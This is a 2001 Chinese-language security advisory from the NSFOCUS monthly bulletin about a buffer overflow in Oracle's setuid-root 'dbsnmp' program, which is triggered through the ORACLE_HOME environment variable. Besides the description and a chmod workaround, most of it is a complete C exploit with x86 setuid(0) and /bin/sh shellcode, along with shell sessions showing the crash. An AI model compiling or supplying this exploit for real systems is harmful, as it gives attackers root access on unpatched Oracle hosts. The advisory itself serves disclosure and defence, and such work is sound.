首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第24期->最新漏洞
期刊号: 类型: 关键词:
oracle‘dbsnmp’缓冲区溢出漏洞

日期:2001-08-13

受影响的系统:  
Oracle 8.1.6
Oracle 8.1.7
Oracle 9i
- Linux
描述:
--------------------------------------------------------------------------------


Oracle 8.1.6/7所带的'dbsnmp'程序缺省设置了setuid root属性。这个程序在处理环境
变量ORACLE_HOME时,没有进行有效的边界检查,如果将其设置为超过749字节长的字符串。
攻击者就可以引发一个缓冲区溢出。通过覆盖内存中的敏感数据,攻击者可以获取root权限。

由于缺省安装时,'dbsnmp'只允许'oinstall'组用户执行,因此攻击者必须首先获取'oinstall'
组权限才可以提升权限。

<*来源:Juan Manuel Pascual (pask@plazasite.com) *>

测试程序:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!



Juan Manuel Pascual (pask@plazasite.com)提供了如下测试代码:


[oracle@proves1 iAS]$ ls -alc
/usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp
-rwsr-s---    1 root     oinstall   667874 jul 18 15:38
/usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp

[oracle@proves1 8.1.6]$ export ORACLE_HOME=`perl -e 'print "A"x749'`
[oracle@proves1 8.1.6]$
/usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462
Failed to initialize nl component,error=462

[oracle@proves1 8.1.6]$[oracle@proves1 8.1.6]$ export ORACLE_HOME=`perl
-e 'print "A"x750'`
[oracle@proves1 8.1.6]$ dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Segmentation fault


这个缓冲区溢出在Oracle 9i中也存在:



[oracle@proves1 iAS]$ ls -alc
/usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp
-rwsr-s---    1 root     oinstall   971665 abr 11 17:41
/usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp

[oracle@proves1 iAS]$ export ORACLE_HOME=`perl -e 'print "A"x749'`
[oracle@proves1 iAS]$
/usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp
couldn't read file "/config/nmiconf.tcl": no such file or directory
Failed to initialize nl component,error=462

[oracle@proves1 iAS]$ Failed to initialize nl component,error=462
[oracle@proves1 iAS]$ export ORACLE_HOME=`perl -e 'print "A"x750'`
[oracle@proves1 iAS]$
/usr/local/oracle/app/oracle/product/iAS/bin/dbsnmp
Segmentation fault

/* Exploit code for dbsnmp binary in Oracle 8.1.6.0.0 Linux Platform. I tested
it in RH 6.2.

dbsnmp makes setresuid(,getuid(),) before reading ORACLE_HOME environment
variable. Its necessary to call setuid(0) before normal shellcode.

In My tests Offset may vary from 7846 to 7896. Its posible to obtain a normal
(uid=oracle) shell for low offsets (incomplete setuid(0) jumps).



"Cae fuego en lugar de mana
Se disfraza el asfalto de mar
El zapato no encuentra el pedal
Parece que anda suelto satanas."

            L.E.Aute



This vulnerability was researched by:
    Juan Manuel Pascual <pask@plazasite.com>

Special thanks to:

    Ivan Sanchez <isanchez@plazasite.com>
    Mundo Alonso-Cuevillas <mundo@plazasite.com>
*/





#include <stdio.h>
#include <stdlib.h>

#define BUFFER                                  800
#define OFFSET                                 7896
#define NOP                                    0x90
#define BINARY  "/usr/local/oracle/app/oracle/product/8.1.6/bin/dbsnmp"


char shellcode[] =
"\x90"        /* Additional NOP */
"\x31\xc0"    /* begin setuid (0) */
"\x31\xdb"
"\xb0\x17"
"\xcd\x80"

"\xeb\x1f"
"\x5e"
"\x89\x76\x08"
"\x31\xc0"
"\x88\x46\x07"
"\x89\x46\x0c"
"\xb0\x0b"
"\x89\xf3"
"\x8d\x4e\x08"
"\x8d\x56\x0c"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\x40"
"\xcd\x80"
"\xe8\xdc\xff\xff\xff"
"/bin/sh";


unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr,binary[120];
  long *addr_ptr, addr;
  int bsize=BUFFER;
  int i,offset=OFFSET;

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() -offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  memset(buff,bsize/2,NOP);

ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';
setenv("ORACLE_HOME",buff,1);
system(BINARY);
}


--------------------------------------------------------------------------------
建议:

临时解决方法:

去掉'dbsnmp'的suid属性:
# chmod a-s <oracle所在目录>/bin/dbsnmp

厂商补丁:

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.oracle.com/

版权所有,未经许可,不得转载